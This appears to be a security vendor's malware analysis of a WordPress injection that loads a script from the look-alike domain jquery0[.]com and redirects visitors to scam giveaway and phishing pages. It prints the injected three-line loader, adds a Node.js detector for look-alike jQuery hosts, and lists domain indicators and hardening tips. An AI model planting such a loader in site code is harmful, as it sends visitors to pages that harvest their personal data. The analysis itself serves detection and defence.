Website visitors may see the reputable jQuery name in the requests and assume that the resource is safe to load. Unfortunately, the domain only resembles the legitimate one (note the trailing 0 in jquery0[.]com) and is malicious in nature. This is a common tactic used in phishing and spam campaigns to trick victims into thinking resources are legitimate.
Let’s take a look at the injection.
```javascript
var khutmhpx = document.createElement('script');                 // build a new <script> element
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';                  // point it at the look-alike domain (defanged here)
document.getElementsByTagName('head')[0].appendChild(khutmhpx);  // attach it to <head>; the browser fetches and runs it
```
Let’s break down what this three-line piece of code is doing.
- First, the code creates a new script element with https://jquery0[.]com/JkrJYcvQ as its src attribute.
- Next, it appends that element to the page’s head, which makes the browser fetch the remote script and execute it.
- Finally, the fetched script from https://jquery0[.]com/JkrJYcvQ redirects visitors to scam websites.
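The loader above is easy to hunt for once you know its shape. The following Node.js script is an added example written for this page (it is not code from the original post or from the malware): it pulls every absolute script URL out of a file’s contents, both the dynamic `.src = '...'` form used by this injection and literal `<script src="...">` tags, and flags any hostname that borrows the jQuery name but is not one of a small allow-list of legitimate jQuery CDNs. The allow-list, the `[.]` refanging helper and the two sample files are assumptions made for the demo.

```javascript
'use strict';
// Added example: flag <script> loaders that point at look-alike jQuery hosts.
// The allow-list is an assumption for the demo; extend it to the CDNs your
// site really uses. The sample file contents at the bottom are constructed.

const LEGIT_JQUERY_HOSTS = new Set([
  'code.jquery.com',
  'ajax.googleapis.com',
  'cdnjs.cloudflare.com',
  'cdn.jsdelivr.net',
]);

// Two loader shapes: a dynamically created element whose .src is assigned
// (the shape of the jquery0[.]com injection) and a literal <script src="">.
const DYNAMIC_SRC_RE = /\.src\s*=\s*(['"])(https?:\/\/[^'"]+)\1/g;
const STATIC_SRC_RE = /<script\b[^>]*\ssrc\s*=\s*(['"])(https?:\/\/[^'"]+)\1/gi;

// Undo the "[.]" defanging used in write-ups so the URL parser accepts it.
function refang(url) {
  return url.replace(/\[\.\]/g, '.');
}

// Pull every absolute script URL out of a blob of HTML/JS/PHP source.
function extractScriptSources(text) {
  const sources = [];
  for (const re of [DYNAMIC_SRC_RE, STATIC_SRC_RE]) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(text)) !== null) sources.push(refang(m[2]));
  }
  return sources;
}

// A host borrows the jQuery name if any label contains "jquery":
// jquery0.com, jquery-cdn.example and jquery.com.evil.example all qualify.
function looksLikeJquery(hostname) {
  return hostname.toLowerCase().includes('jquery');
}

// Returns [{src, host}] for every loader that uses the jQuery name
// but is not served from a known legitimate host.
function findLookalikeJqueryLoaders(text) {
  const findings = [];
  for (const src of extractScriptSources(text)) {
    let host;
    try {
      host = new URL(src).hostname;
    } catch (e) {
      continue; // not a parseable absolute URL; ignore it
    }
    if (looksLikeJquery(host) && !LEGIT_JQUERY_HOSTS.has(host)) {
      findings.push({ src, host });
    }
  }
  return findings;
}

// Constructed sample: a theme file with a legitimate loader plus the
// injection discussed above (domain kept defanged, as in the write-up).
const SAMPLE_INFECTED_FILE = `
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);
</script>
`;

// Constructed sample: a clean file loading jQuery from an allow-listed CDN.
const SAMPLE_CLEAN_FILE = `
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
`;

const DEMO_FINDINGS = findLookalikeJqueryLoaders(SAMPLE_INFECTED_FILE);
```

Run it over the output of a recursive read of wp-includes, wp-content and the theme directory; the legitimate code.jquery.com loader in the sample is not reported, the jquery0[.]com loader is. A hit is a reason to pull the file and review it, not proof of compromise by itself, since a site may legitimately self-host jQuery on a domain this heuristic does not know.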
This injection has been found in a number of different WordPress files, like these for example:
Dissecting the malicious jquery0[.]com domain
Let’s take a closer look at the malicious domain used in the script we just described.
Reviewing the WHOIS data for the https://jquery0[.]com domain can reveal a lot about it.
From these results, we know the following:
- The domain was registered recently (July 04, 2022).
- The domain’s name servers are on Cloudflare, which attackers commonly use to obscure their hosting.
Notably, the domain uses Cloudflare only for its name servers, not for Cloudflare’s proxy and firewall, so its DNS records expose the origin directly: they point to IP 62[.]233[.]50[.]75 on the Russian CHANGWAY-AS network: https://urlscan.io/ip/62.233.50.75.
Redirects to scam pages
Once the malicious script is initiated, end users are redirected to scam websites which coerce victims into submitting personal information. For example, one of the variants promotes the following fake Apple iPhone 13 Pro giveaway.
When the victim clicks Ok, they are redirected to a form that harvests sensitive personal details.
As is common with phishing pages, attackers leverage a sense of urgency and expiration date to compel victims into making a quick decision to enter their data.
This is only one of many possible variants of this scam, however. Malwarebytes has recently revealed that this domain is also linked to FakeUpdates and SocGholish malware campaigns.
💡 The same injection with jquery0[.]com is also used to redirect to #FakeUpdates/#SocGholish
➡️ Domain shadowing:
[.]demand[.]sageyogatherapies[.]com https://t.co/tGQvh5MMax pic.twitter.com/nmjADVmqWs
— Malwarebytes Threat Intelligence (@MBThreatIntel) October 12, 2022
Typical domain names that the infection redirects to include:
The owners of these domains also operate dating scam sites on domains such as
URLScan detections and internal SiteCheck data show ongoing activity for the jquery0[.]com domain.
Injecting malicious scripts into WordPress files is a common tactic used by attackers once they have gained unauthorized access to a WordPress website. These scripts can be well hidden in WordPress core and plugin files, and they trick end users into giving away their personal information.
- Keep your plugins, themes, and website software up to date. Always patch to the latest version to mitigate the risk from known software vulnerabilities.
- Regularly scan for backdoors and malware, at both the server and the client level, to identify any malicious injections, SEO spam, or backdoors that may be lurking on your site.
- Enforce unique, strong passwords for all of your accounts, including credentials for SFTP, the database, cPanel, and WordPress admin users.
- Monitor your logs for indicators of compromise. Regularly check for unusual or suspicious behavior, and consider using a file integrity monitoring system on your website.
- Use a web application firewall (WAF). A firewall can help block bad bots, prevent brute force attacks, and detect attacks in your environment.
And if you believe your site has been compromised or injected with malicious scripts, we can help! Reach out to our support team for assistance and we can get the malware cleaned up for you.